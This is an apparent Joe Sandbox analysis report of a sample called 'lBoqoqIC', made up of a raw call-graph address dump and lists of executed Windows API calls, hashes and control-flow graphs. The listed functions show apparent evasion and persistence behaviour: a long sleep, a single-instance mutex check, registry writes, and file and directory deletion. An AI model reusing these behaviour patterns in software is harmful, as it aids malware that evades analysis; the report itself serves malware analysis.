4c6033 ctype 35 API calls 126261->126281 126299 4c6033 ctype 35 API calls 126262->126299 126269 4c6033 ctype 35 API calls 126263->126269 126282 4354d1 126264->126282 126283 4354f8 126264->126283 126265->126262 126284 4355b6 126266->126284 126285 4355d9 126266->126285 126272 4c6033 ctype 35 API calls 126267->126272 126300 403d43 56 API calls 126268->126300 126290 435525 126269->126290 126291 435471 126270->126291 126292 4c6033 ctype 35 API calls 126271->126292 126293 43560a 126272->126293 126294 4c6033 ctype 35 API calls 126273->126294 126295 4c6033 ctype 35 API calls 126274->126295 126275->126262 126296 4c6033 ctype 35 API calls 126276->126296 126277->126262 126278->126262 126297 435430 126279->126297 126298 43540c 126279->126298 126302 4c6033 ctype 35 API calls 126280->126302 126281->126262 126282->126268 126310 4c6033 ctype 35 API calls 126282->126310 126301 4c6033 ctype 35 API calls 126283->126301 126284->126268 126312 4c6033 ctype 35 API calls 126284->126312 126289 4c6033 ctype 35 API calls 126285->126289 126287 43569f 126286->126287 126303 4c6033 ctype 35 API calls 126287->126303 126304 435a8a 126288->126304 126305 4355e6 126289->126305 126306 4c6033 ctype 35 API calls 126290->126306 126307 4c6033 ctype 35 API calls 126291->126307 126292->126262 126308 4c6033 ctype 35 API calls 126293->126308 126294->126262 126295->126262 126296->126262 126311 4c6033 ctype 35 API calls 126297->126311 126298->126268 126318 4c6033 ctype 35 API calls 126298->126318 126299->126268 126309 435717 126300->126309 126313 435505 126301->126313 126314 435455 126302->126314 126303->126262 126316 4c5eaa ctype 32 API calls 126304->126316 126317 4c6033 ctype 35 API calls 126305->126317 126306->126262 126307->126262 126308->126262 126319 403d6d 56 API calls 126309->126319 126320 4354e5 126310->126320 126321 435439 126311->126321 126322 4355c6 126312->126322 126323 4c6033 ctype 35 API calls 126313->126323 126315 4c6033 ctype 35 API calls 126314->126315 126315->126262 126324 435a96 126316->126324 126317->126262 126325 43541d 126318->126325 126326 435722 126319->126326 126327 4c6033 ctype 35 API calls 126320->126327 126328 4c6033 ctype 35 API calls 126321->126328 126329 4c6033 ctype 35 API calls 126322->126329 126323->126262 126324->126163 126330 4c6033 ctype 35 API calls 126325->126330 126331 403d97 56 API calls 126326->126331 126327->126262 126328->126262 126329->126262 126330->126262 126332 43572d 126331->126332 126333 403e6d 90 API calls 126332->126333 126334 435741 126333->126334 126335 435795 GetVersionExA 126334->126335 126337 4c5f18 ctype 67 API calls 126334->126337 126336 4357b4 126335->126336 126423 435a20 126335->126423 126338 4af56e ctype 29 API calls 126336->126338 126340 435755 126337->126340 126342 4357c1 126338->126342 126339 4c5eaa ctype 32 API calls 126343 435a35 126339->126343 126341 40414b 94 API calls 126340->126341 126344 435767 126341->126344 126349 4358e0 126342->126349 126350 4357e4 126342->126350 126342->126423 126345 4c5eaa ctype 32 API calls 126343->126345 126346 4c5fe3 ctype 35 API calls 126344->126346 126347 435a41 126345->126347 126348 435774 126346->126348 126351 4c5eaa ctype 32 API calls 126347->126351 126352 4c5eaa ctype 32 API calls 126348->126352 126361 435960 126349->126361 126362 4358eb 126349->126362 126403 43595e 126349->126403 126353 4358c7 126350->126353 126354 4357ea 126350->126354 126355 435a4d 126351->126355 126356 435780 126352->126356 126359 4c6033 ctype 35 API calls 126353->126359 126357 435853 126354->126357 126358 4357ef 126354->126358 126514 404bfb 34 API calls 2 library calls 126355->126514 126356->126335 126363 435789 126356->126363 126376 4358ab 126357->126376 126377 435869 126357->126377 126357->126403 126364 4357f1 126358->126364 126365 435837 126358->126365 126367 4358d0 126359->126367 126366 4c6033 ctype 35 API calls 126361->126366 126373 4358f8 126362->126373 126374 43593f 126362->126374 126362->126403 126369 4c5fe3 ctype 35 API calls 126363->126369 126364->126403 126409 4c6033 ctype 35 API calls 126364->126409 126372 4c6033 ctype 35 API calls 126365->126372 126370 43596d 126366->126370 126371 4c6033 ctype 35 API calls 126367->126371 126368 403d43 56 API calls 126375 4359a3 126368->126375 126369->126335 126379 4c6033 ctype 35 API calls 126370->126379 126402 43582d 126371->126402 126380 435840 126372->126380 126381 435926 126373->126381 126382 4358fd 126373->126382 126378 4c6033 ctype 35 API calls 126374->126378 126383 403d6d 56 API calls 126375->126383 126389 4c6033 ctype 35 API calls 126376->126389 126385 43588f 126377->126385 126386 43586c 126377->126386 126388 435948 126378->126388 126379->126402 126390 4c6033 ctype 35 API calls 126380->126390 126387 4c6033 ctype 35 API calls 126381->126387 126397 4c6033 ctype 35 API calls 126382->126397 126382->126403 126384 4359ae 126383->126384 126391 403d97 56 API calls 126384->126391 126393 4c6033 ctype 35 API calls 126385->126393 126399 4c6033 ctype 35 API calls 126386->126399 126386->126403 126392 43592f 126387->126392 126394 4c6033 ctype 35 API calls 126388->126394 126396 4358b4 126389->126396 126390->126402 126398 4359b9 126391->126398 126400 4c6033 ctype 35 API calls 126392->126400 126401 435898 126393->126401 126394->126402 126395 4c6033 ctype 35 API calls 126395->126403 126404 4c6033 ctype 35 API calls 126396->126404 126405 435916 126397->126405 126406 403e6d 90 API calls 126398->126406 126407 43587c 126399->126407 126400->126402 126408 4c6033 ctype 35 API calls 126401->126408 126402->126395 126403->126368 126404->126402 126410 4c6033 ctype 35 API calls 126405->126410 126411 4359cd 126406->126411 126412 4c6033 ctype 35 API calls 126407->126412 126408->126402 126413 435824 126409->126413 126410->126402 126415 4c5f18 ctype 67 API calls 126411->126415 126411->126423 126412->126402 126414 4c6033 ctype 35 API calls 126413->126414 126414->126402 126416 4359e1 126415->126416 126417 40414b 94 API calls 126416->126417 126418 4359f2 126417->126418 126419 4c5fe3 ctype 35 API calls 126418->126419 126420 4359ff 126419->126420 126421 4c5eaa ctype 32 API calls 126420->126421 126422 435a0b 126421->126422 126422->126423 126424 4c5fe3 ctype 35 API calls 126422->126424 126423->126339 126424->126423 126426 4252d6 __EH_prolog 126425->126426 126427 41ef1b 141 API calls 126426->126427 126428 4252e5 126427->126428 126429 41ebe5 141 API calls 126428->126429 126430 4252ed 126429->126430 126431 41ec79 141 API calls 126430->126431 126432 4252f5 126431->126432 126433 4c5f18 ctype 67 API calls 126432->126433 126434 425301 126433->126434 126435 4c5c1f ctype 36 API calls 126434->126435 126436 425315 126435->126436 126517 41f1c0 126436->126517 126439 4c5fe3 ctype 35 API calls 126440 42532d 126439->126440 126441 4c5eaa ctype 32 API calls 126440->126441 126442 425338 126441->126442 126443 41ec79 141 API calls 126442->126443 126444 425340 126443->126444 126445 4c5f18 ctype 67 API calls 126444->126445 126446 42534b 126445->126446 126447 4c5f18 ctype 67 API calls 126446->126447 126448 42535d 126447->126448 126449 41ec79 141 API calls 126448->126449 126452 425383 126448->126452 126450 425378 126449->126450 126451 4c6033 ctype 35 API calls 126450->126451 126451->126452 126453 41ee69 41 API calls 126452->126453 126454 42539d __ftol 126452->126454 126453->126454 126455 41ee69 41 API calls 126454->126455 126456 4253be __ftol 126454->126456 126455->126456 126457 4c5f18 ctype 67 API calls 126456->126457 126458 4253dc 126457->126458 126459 4c5fe3 ctype 35 API calls 126458->126459 126460 4253ec 126459->126460 126461 4c5fe3 ctype 35 API calls 126460->126461 126462 4253f8 126461->126462 126463 4c5fe3 ctype 35 API calls 126462->126463 126464 425404 126463->126464 126525 4087db 126464->126525 126468 425427 126469 4c5fe3 ctype 35 API calls 126468->126469 126471 425434 126469->126471 126473 4c5eaa ctype 32 API calls 126471->126473 126472 42545d 126474 4815f0 141 API calls 126472->126474 126475 425440 126473->126475 126476 425466 126474->126476 126556 41eea7 141 API calls 126475->126556 126477 4c5eaa ctype 32 API calls 126476->126477 126478 425475 126477->126478 126557 408784 32 API calls 2 library calls 126478->126557 126480 425481 126481 4c5eaa ctype 32 API calls 126480->126481 126482 42548d 126481->126482 126483 4c5eaa ctype 32 API calls 126482->126483 126484 425499 126483->126484 126485 4c5eaa ctype 32 API calls 126484->126485 126486 4254a5 126485->126486 126486->126163 126487->126156 126488->126158 126489->126164 126494 481340 126490->126494 126493->126180 126496 481352 126494->126496 126495 41ee76 timeGetTime 126495->126176 126496->126495 126498 48a710 41 API calls ctype 126496->126498 126498->126495 126516 4aef44 126499->126516 126501 4146e0 SHGetSpecialFolderLocation 126502 414779 126501->126502 126503 41470c SHGetPathFromIDList 126501->126503 126504 4c5c1f ctype 36 API calls 126502->126504 126503->126502 126505 414720 SHGetMalloc 126503->126505 126506 414786 126504->126506 126508 414737 lstrlen 126505->126508 126507 4c5eaa ctype 32 API calls 126506->126507 126509 414795 126507->126509 126511 414759 lstrlen 126508->126511 126512 41476a 126508->126512 126509->126198 126511->126512 126513 4c6033 ctype 35 API calls 126512->126513 126513->126502 126514->126206 126515->126220 126516->126501 126518 41f1ca __EH_prolog 126517->126518 126519 4c5c1f ctype 36 API calls 126518->126519 126520 41f1e6 126519->126520 126521 478ba6 48 API calls 126520->126521 126522 41f1f9 126521->126522 126523 4c5eaa ctype 32 API calls 126522->126523 126524 41f208 126523->126524 126524->126439 126526 4087e5 __EH_prolog 126525->126526 126527 408828 LoadLibraryA 126526->126527 126528 40885c GetProcAddress 126527->126528 126529 40883c LoadLibraryExA 126527->126529 126530 40886f 126528->126530 126532 40887b ctype 126528->126532 126529->126528 126533 408850 ctype 126529->126533 126531 408a4c FreeLibrary 126530->126531 126531->126533 126534 4c5c1f ctype 36 API calls 126532->126534 126538 40889b 126532->126538 126535 4c42c5 ctype 32 API calls 126533->126535 126536 4088b3 126534->126536 126537 408a7a 126535->126537 126562 408ab3 39 API calls 2 library calls 126536->126562 126540 4c5eaa ctype 32 API calls 126537->126540 126558 408b73 126538->126558 126542 408a86 126540->126542 126542->126475 126555 408a98 36 API calls ctype 126542->126555 126544 408a3a 126546 4c2c3a 62 API calls 126544->126546 126545 408a2c 126545->126531 126547 4c6033 ctype 35 API calls 126545->126547 126546->126530 126547->126530 126548 4c281a 37 API calls ctype 126553 4088ba 126548->126553 126549 4c279e 37 API calls 126549->126553 126550 4af56e 29 API calls ctype 126550->126553 126552 4c5fe3 35 API calls ctype 126552->126553 126553->126538 126553->126548 126553->126549 126553->126550 126553->126552 126554 4c5eaa 32 API calls ctype 126553->126554 126563 4b0298 6 API calls _wctomb_s 126553->126563 126554->126553 126555->126468 126556->126472 126557->126480 126559 408b99 Sleep 126558->126559 126561 408a18 126559->126561 126561->126544 126561->126545 126562->126553 126563->126553 126564 4cb1b5 126565 4cb1ce 126564->126565 126566 4cb1be 126564->126566 126572 4cab71 126565->126572 126577 4d1a1f 28 API calls ctype 126566->126577 126569 4cb1c3 126569->126565 126578 4d6b09 29 API calls ctype 126569->126578 126573 4cab81 126572->126573 126574 4cab88 PeekMessageA 126573->126574 126575 4cabe3 126573->126575 126576 4cabd2 PeekMessageA 126573->126576 126574->126573 126576->126573 126577->126569 126578->126565 126579 4d4bb1 126584 4d4bbb 126579->126584 126581 4d4bb6 126592 4af01b 35 API calls 126581->126592 126583 4d4bcf 126585 4d4c2d GetVersion 126584->126585 126586 4d4c6e GetProcessVersion 126585->126586 126587 4d4c80 126585->126587 126586->126587 126593 4cb66c KiUserCallbackDispatcher GetSystemMetrics 126587->126593 126589 4d4c87 126600 4cb628 7 API calls 126589->126600 126591 4d4c91 LoadCursorA LoadCursorA 126591->126581 126592->126583 126594 4cb68b 126593->126594 126595 4cb692 126593->126595 126601 4d4bdb GetSystemMetrics GetSystemMetrics 126594->126601 126602 4d4c0b GetSystemMetrics GetSystemMetrics 126595->126602 126598 4cb697 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 126598->126589 126599 4cb690 126599->126598 126600->126591 126601->126599 126602->126598 126603 479178 126608 479182 126603->126608 126609 4791da __EH_prolog 126608->126609 126615 4d3de1 126609->126615 126611 4791f2 126625 46d587 126611->126625 126616 4d3deb __EH_prolog 126615->126616 126659 4d3aa8 126616->126659 126619 4d3e11 126621 4d373b ctype 28 API calls 126619->126621 126622 4d3e1f 126621->126622 126623 4d4878 ctype 21 API calls 126622->126623 126624 4d3e31 GetCurrentThread GetCurrentThreadId 126623->126624 126624->126611 126626 46d591 __EH_prolog 126625->126626 126665 473444 126626->126665 126660 4d3ab2 __EH_prolog 126659->126660 126664 4d3ae5 GetCursorPos 126660->126664 126662 4d3ad6 126662->126619 126663 4b5ac3 29 API calls 2 library calls 126662->126663 126663->126619 126664->126662 126666 47344e __EH_prolog 126665->126666 126793 488b30 126666->126793 126668 473470 126799 488780 126668->126799 127062 4889b0 141 API calls ctype 126793->127062 126795 488b38 ctype 126796 488b84 126795->126796 127063 488cb0 141 API calls ctype 126795->127063 126796->126668 126798 488b7d 126798->126668 127064 4887d0 126799->127064 126803 48879d 126804 481830 141 API calls 126803->126804 126805 4887a3 126804->126805 126806 4815f0 141 API calls 126805->126806 126807 4887ae 126806->126807 126808 481930 141 API calls 126807->126808 126809 473487 126808->126809 126810 487680 126809->126810 126811 4830d0 141 API calls 126810->126811 126812 47348f 126811->126812 126813 485b60 126812->126813 126814 4830d0 141 API calls 126813->126814 126815 485b77 126814->126815 126816 4815a0 141 API calls 126815->126816 126817 485b84 126816->126817 127062->126795 127063->126798 127065 4815a0 141 API calls 127064->127065 127066 4887e2 127065->127066 127067 4830d0 141 API calls 127066->127067 127068 4887fc 127067->127068 127069 4815a0 141 API calls 127068->127069 127070 488809 127069->127070 127071 4815a0 141 API calls 127070->127071 127072 488816 127071->127072 127107 481960 127072->127107 127075 4815a0 141 API calls 127076 48882e 127075->127076 127077 481830 141 API calls 127076->127077 127078 488834 127077->127078 127079 4815a0 141 API calls 127078->127079 127080 488851 127079->127080 127081 4815a0 141 API calls 127080->127081 127082 48885e 127081->127082 127083 481960 141 API calls 127082->127083 127084 488866 127083->127084 127111 481690 127084->127111 127087 481960 141 API calls 127088 48887e 127087->127088 127089 481960 141 API calls 127088->127089 127090 48878b 127089->127090 127091 4830d0 127090->127091 127092 4830e3 127091->127092 127099 48312c 127091->127099 127093 4815f0 141 API calls 127092->127093 127095 4830ea 127093->127095 127094 4831a3 127094->126803 127096 481770 141 API calls 127095->127096 127100 4830f5 127096->127100 127097 4815f0 141 API calls 127097->127099 127098 481690 141 API calls 127098->127099 127099->127094 127099->127097 127099->127098 127101 481930 141 API calls 127099->127101 127100->127099 127102 481830 141 API calls 127100->127102 127101->127099 127103 483112 127102->127103 127104 4815f0 141 API calls 127103->127104 127105 483119 127104->127105 127106 481930 141 API calls 127105->127106 127106->127099 127108 481971 127107->127108 127109 48d2c0 ctype 141 API calls 127108->127109 127110 481982 127109->127110 127110->127075 127112 4816a9 127111->127112 127113 4816a3 127111->127113 127117 48ca30 127112->127117 127120 489da0 141 API calls ctype 127113->127120 127116 4816b7 127116->127087 127118 48dd50 ctype 141 API calls 127117->127118 127119 48ca4c ctype 127118->127119 127119->127116 127120->127112

                                                                                                                Executed Functions

                                                                                                                Function 0049E980 Relevance: 104.2, APIs: 58, Strings: 1, Instructions: 941stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,?), ref: 0049E9B0
                                                                                                                • lstrcat.KERNEL32(?,00510870), ref: 0049EA24
                                                                                                                • lstrcpy.KERNEL32(0000075E,?), ref: 0049EA7D
                                                                                                                • CharNextA.USER32(?), ref: 0049EA9A
                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 0049EAB1
                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 0049EAE0
                                                                                                                • lstrcat.KERNEL32(0000075E,?), ref: 0049EAF0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcpy$lstrcat$CharNextValue
                                                                                                                • String ID: 1
                                                                                                                • API String ID: 89198350-2212294583
                                                                                                                • Opcode ID: ad68a6ee470f24b43202929697fe6708f043ebdbb7c53b38e45a62e054b4148b
                                                                                                                • Instruction ID: ac321c7f4d244bd38f1624eaa5a46420c787ebbff42c379b791db125affa82a7
                                                                                                                • Opcode Fuzzy Hash: ad68a6ee470f24b43202929697fe6708f043ebdbb7c53b38e45a62e054b4148b
                                                                                                                • Instruction Fuzzy Hash: B672E2716003459BEB30DB65DC81FEBB7E8AB94304F04493EE549C7282E779E909CB5A
                                                                                                                Function 100034F0 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 591sleepfilesynchronizationCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2009 100034f0-10003c1b call 10004be0 2012 10003c21-10003c2b call 100045f0 2009->2012 2013 10003caa-10003cba call 10002bb0 call 10004e80 2009->2013 2018 10003c42-10003c4e 2012->2018 2019 10003c2d-10003c38 GetFileAttributesA 2012->2019 2027 10003cc0-10003e8a call 10001030 call 10004be0 call 100045f0 2013->2027 2028 10004152-10004166 call 10008d24 2013->2028 2018->2012 2024 10003c50 2018->2024 2021 10003c52-10003c84 call 1000bee1 Sleep CreateMutexA GetLastError 2019->2021 2022 10003c3a-10003c3f call 1000bee1 2019->2022 2033 10003ca4 CloseHandle 2021->2033 2034 10003c86-10003ca3 CloseHandle call 10008d24 2021->2034 2022->2018 2024->2013 2027->2028 2043 10003e90-10003eab call 1000be8d call 10009a10 2027->2043 2033->2013 2048 10003eb1-10003eb6 2043->2048 2049 10004149-1000414f call 1000bee1 2043->2049 2048->2049 2051 10003ebc-10003ec6 GetFileAttributesA 2048->2051 2049->2028 2053 10003ec8-10003ed3 CreateDirectoryA 2051->2053 2054 10003ed9-10003eff call 10001d70 call 10004170 2051->2054 2053->2054 2055 10004111-10004120 call 1000bee1 * 2 2053->2055 2063 10004103-1000410b DeleteFileA RemoveDirectoryA 2054->2063 2064 10003f05-10003f17 2054->2064 2055->2028 2063->2055 2066 10003f20-10003f24 2064->2066 2067 10003fd4-10003fe6 call 10009a10 2066->2067 2068 10003f2a-10003f43 2066->2068 2077 100040c7-100040ee call 10004c80 * 2 call 100051c0 2067->2077 2078 10003fec-10003ff5 2067->2078 2069 10003f49-10003f68 2068->2069 2070 10003fce 2068->2070 2072 10003fc6-10003fcc 2069->2072 2073 10003f6a-10003f89 2069->2073 2070->2067 2072->2067 2075 10003f8b-10003fb6 2073->2075 2076 10003fbe-10003fc4 2073->2076 2075->2066 2079 10003fbc 2075->2079 2076->2067 2095 100040f3-100040f5 2077->2095 2078->2077 2081 10003ffb 2078->2081 2079->2067 2083 10004005-10004009 2081->2083 2084 100040c2-100040c4 2083->2084 2085 1000400f-1000402a 2083->2085 2084->2077 2087 10004030-10004051 2085->2087 2088 100040bc 2085->2088 2090 10004053-10004074 2087->2090 2091 100040b4-100040ba 2087->2091 2088->2084 2093 10004076-100040a4 2090->2093 2094 100040ac-100040b2 2090->2094 2091->2084 2093->2083 2098 100040aa 2093->2098 2094->2084 2096 10004122-10004148 call 1000bee1 * 2 call 10008d24 2095->2096 2097 100040f7-100040fe call 100065d0 * 2 2095->2097 2097->2063 2098->2084
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,1001C05C,1001C030), ref: 10003C2E
                                                                                                                • Sleep.KERNEL32(00057E40), ref: 10003C5F
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 10003C70
                                                                                                                • GetLastError.KERNEL32 ref: 10003C78
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10003CA4
                                                                                                                • DeleteFileA.KERNEL32(00000000,?,00000000,00000001,000000FF,000000F0,00004000,00000001,00000000,00000000,?,?,00000000), ref: 10004104
                                                                                                                • RemoveDirectoryA.KERNEL32(00000000,?,?,00000000,?,?,?,?,1001C05C,1001C030), ref: 1000410B
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10003C86
                                                                                                                  • Part of subcall function 1000BEE1: _free.LIBCMT ref: 1000BEF4
                                                                                                                • _strrchr.LIBCMT ref: 10003EA1
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,?,00000000,?,?,?,?,1001C05C,1001C030), ref: 10003EBD
                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,1001C05C,1001C030), ref: 10003ECB
                                                                                                                • _strrchr.LIBCMT ref: 10003FDC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCloseCreateDirectoryHandle_strrchr$DeleteErrorLastMutexRemoveSleep_free
                                                                                                                • String ID: 6A2V
                                                                                                                • API String ID: 2466807127-3928244006
                                                                                                                • Opcode ID: 9073780255d0488a3a7c38908a7e10ec266a7cacfbcac4d5d6845679b204dff9
                                                                                                                • Instruction ID: 4ffcfcd5c6023365c1a35ea2a6b59db73bd97b154c4638eeb213454f61270c67
                                                                                                                • Opcode Fuzzy Hash: 9073780255d0488a3a7c38908a7e10ec266a7cacfbcac4d5d6845679b204dff9
                                                                                                                • Instruction Fuzzy Hash: FF62C1B4E057688ADB60CF18CD81B99BBB0EF4A258F0041D9D90DA7751DB3A6EC1CF49
                                                                                                                Function 10005560 Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 481registrymemorysleepCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2222 10005560-100058d4 RegCreateKeyExA 2223 100058da-10005909 RegGetValueA 2222->2223 2224 10005fee 2222->2224 2225 10005fe8 RegCloseKey 2223->2225 2226 1000590f-10005915 RegCloseKey 2223->2226 2227 10005ff3-10006005 call 10008d24 2224->2227 2225->2224 2228 10005917-1000591d 2226->2228 2230 10005957-10005b1b call 10001000 2228->2230 2231 1000591f-1000592b 2228->2231 2238 10005b20-10005b5d call 1000e41c call 1000bf28 call 1000bf07 Sleep call 100042d0 2230->2238 2231->2230 2233 1000592d-10005939 2231->2233 2233->2230 2235 1000593b-10005947 2233->2235 2235->2230 2237 10005949-10005955 2235->2237 2237->2228 2237->2230 2246 10005b62-10005b64 2238->2246 2247 10005c62-10005c74 2246->2247 2248 10005b6a-10005b89 2246->2248 2247->2238 2251 10005c7a-10005c7c 2247->2251 2249 10005b8b 2248->2249 2250 10005bfc-10005c0d 2248->2250 2253 10005b90-10005ba0 2249->2253 2252 10005c10-10005c2a 2250->2252 2251->2227 2252->2252 2254 10005c2c-10005c4b GetProcessHeap HeapFree 2252->2254 2255 10005ba6-10005bc8 2253->2255 2256 10005c5d 2254->2256 2257 10005c4d-10005c53 2254->2257 2258 10005bd6-10005bd8 2255->2258 2259 10005bca-10005bcc 2255->2259 2256->2247 2257->2256 2260 10005c55-10005c5b 2257->2260 2261 10005beb-10005bf1 2258->2261 2263 10005bda 2258->2263 2259->2261 2262 10005bce 2259->2262 2260->2256 2267 10005c81-10005fbb call 10001000 2260->2267 2261->2255 2266 10005bf3-10005bfa 2261->2266 2264 10005be0-10005be5 2262->2264 2268 10005bd0-10005bd2 2262->2268 2263->2264 2265 10005bdc-10005bde 2263->2265 2264->2261 2265->2261 2265->2264 2266->2250 2266->2253 2272 10005fc0-10005fd5 call 10003320 2267->2272 2268->2264 2270 10005bd4 2268->2270 2270->2261 2275 10005fe4-10005fe6 2272->2275 2276 10005fd7-10005fe2 2272->2276 2275->2227 2276->2272 2276->2275
                                                                                                                APIs
                                                                                                                • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,00020119,00000000,?,00000000), ref: 100058CC
                                                                                                                • RegGetValueA.KERNEL32(?,00000000,?,0000FFFF,00000000,?,00000040), ref: 100058FB
                                                                                                                • RegCloseKey.KERNEL32(?), ref: 1000590F
                                                                                                                • Sleep.KERNEL32(-005B8D80), ref: 10005B40
                                                                                                                • GetProcessHeap.KERNEL32(?,00000001,00000000,00000000), ref: 10005C2C
                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 10005C3B
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10005FE8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHeap$CreateFreeProcessSleepValue
                                                                                                                • String ID: 6A2V$}~
                                                                                                                • API String ID: 2565084367-3426175415
                                                                                                                • Opcode ID: 3beda633d26263a205b88fb76175c98f7081ef39fb3af6eb8c07f6e6ec06a78a
                                                                                                                • Instruction ID: 277c2c45b5104139fb1932c0574cf7f95af251a2d1ca7239647193d97ff7ced0
                                                                                                                • Opcode Fuzzy Hash: 3beda633d26263a205b88fb76175c98f7081ef39fb3af6eb8c07f6e6ec06a78a
                                                                                                                • Instruction Fuzzy Hash: B2529BB4D0526C8BDBA6CF18C9957D9BBB8AF48740F1041E9D80CA6251DB316FC1CFA9
                                                                                                                Function 004C5A33 Relevance: 12.1, APIs: 8, Instructions: 72stringfileCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004C5A38
                                                                                                                • GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 004C5A56
                                                                                                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 004C5A65
                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004C5A99
                                                                                                                • CharUpperA.USER32(?), ref: 004C5AAA
                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 004C5AC0
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004C5ACC
                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 004C5ADC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
                                                                                                                • String ID:
                                                                                                                • API String ID: 304730633-0
                                                                                                                • Opcode ID: 705ccb979bf7bfab31dbd8d4151a1215a7be151f2ed41621d05fe21e2148c4c4
                                                                                                                • Instruction ID: f1fb7a23f118810a01444a388ea8ec21bf488214b9b25d62a25a9f5e72461a54
                                                                                                                • Opcode Fuzzy Hash: 705ccb979bf7bfab31dbd8d4151a1215a7be151f2ed41621d05fe21e2148c4c4
                                                                                                                • Instruction Fuzzy Hash: FB217C71500059ABCB10DF66DC88EEF7FBCEF157A0F00822AF815D61A1D7749A45CBA8
                                                                                                                Function 004B967E Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 207timeCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                                                  • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                                                  • Part of subcall function 004B6355: RtlLeaveCriticalSection.NTDLL ref: 004B6362
                                                                                                                • GetTimeZoneInformation.KERNEL32(0000000C,?,?,?,0000000B,0000000B,?,004B966F,004BAE64,?,?,?,?,004B2098,00000000,?), ref: 004B96CC
                                                                                                                • WideCharToMultiByte.KERNEL32(00000220,Eastern Standard Time,000000FF,0000003F,00000000,?,?,004B966F,004BAE64,?,?,?,?,004B2098,00000000,?), ref: 004B9762
